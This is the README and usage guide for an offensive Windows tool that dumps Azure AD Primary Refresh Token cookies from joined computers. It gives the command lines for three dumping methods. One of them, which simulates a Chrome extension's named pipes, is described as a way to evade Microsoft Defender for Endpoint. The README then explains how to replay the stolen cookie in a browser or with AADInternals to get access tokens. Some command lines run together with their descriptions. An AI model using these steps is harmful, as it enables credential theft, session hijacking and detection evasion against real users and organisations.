DumpAADUserRPT is C# implementation of Get-AADIntUserPRTToken from AADInternals which obtain Primary Refresh Token, cookie "x-ms-RefreshTokenCredential", from Azure AD joined or Hybrid joined computer that can be used with SSO and Azure AD.
Since October 2020, it is no longer possible to use a PRT cookie without a nonce. Thus, nonce must be request in the first place in order to request a PRT.
As suggested by Henri, Microsoft Defender for Endpoint (MDE) flagged the approach of obtaining the PRT cookie in the BrowserCore route which just starting the process, providing the nonce on stdin and receiving the PRT cookie on stdout. The detection could be overcome by simulating behaviour of Chrome extension that create the two named pipes which Chrome also uses.
DumpAADUserRPT provides three ways to dump PRT:
- interact with BrowserCore.exe by Dirk-jan
- simulate behaviour of Chrome extension "Windows Accounts"
- invokes the MicrosoftAccountTokenProvider through COM by Lee Christensen
cmd> .\DumpAADUserPRT.exe print_help
DumpAADUserPRT
More info: https://github.com/Hagrid29/DumpAADUserRPT
Options:
Generate nonce:
DumpAADUserRPT.exe get_nonce
Dump PRT by sending request as stdin to BrowserCore:
DumpAADUserRPT.exe get_token [nonce <nonce>]
Dump PRT by copying the behaviour of Chrome extension:
DumpAADUserRPT.exe get_token ChromeExtension [nonce <nonce>] [pause <second>]
Dump PRT by interacting with COM object:
DumpAADUserRPT.exe get_token TokenProvider [nonce <nonce>]
Print AAD info:
DumpAADUserRPT.exe check_aadRequest nonce
cmd> .\DumpAADUserPRT.exe get_nonceRequest PRT by interacting with BrowserCore
cmd> .\DumpAADUserPRT.exe get_tokenRequest PRT by interacting with BrowserCore and supplying with nonce
cmd> .\DumpAADUserPRT.exe get_token nonce xxxxxRequest PRT by simulating behaviour of Chrome extension and executing BrowserCore accordingly
cmd> .\DumpAADUserPRT.exe get_token ChromeExtensionSimulate behaviour of Chrome extension that open up named pipes which last for 60 seconds only. Require manually execute BrowserCore to obtain PRT.
cmd> .\DumpAADUserPRT.exe get_token ChromeExtension pause 60Request PRT by interacting with COM object
cmd> .\DumpAADUserPRT.exe get_token TokenProviderPrint AAD information such as device join type, tenat name, user email
cmd> .\DumpAADUserPRT.exe check_aad- Open a browser and visit https://login.microsoftonline.com/
- Insert cookie named x-ms-RefreshTokenCredential and set the value as PRT
- Refresh the page
- Import AADInternal
- Generate AAD Graph access token by supplying PRT
Get-AADIntAccessTokenForAADGraph -PRTToken $prtToken- https://github.com/Gerenios/AADInternals
- https://bloodhoundenterprise.io/blog/2020/07/14/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso/
- https://medium.com/falconforce/falconfriday-stealing-and-detecting-azure-prt-cookies-0xff18-96efce74ce63
- https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/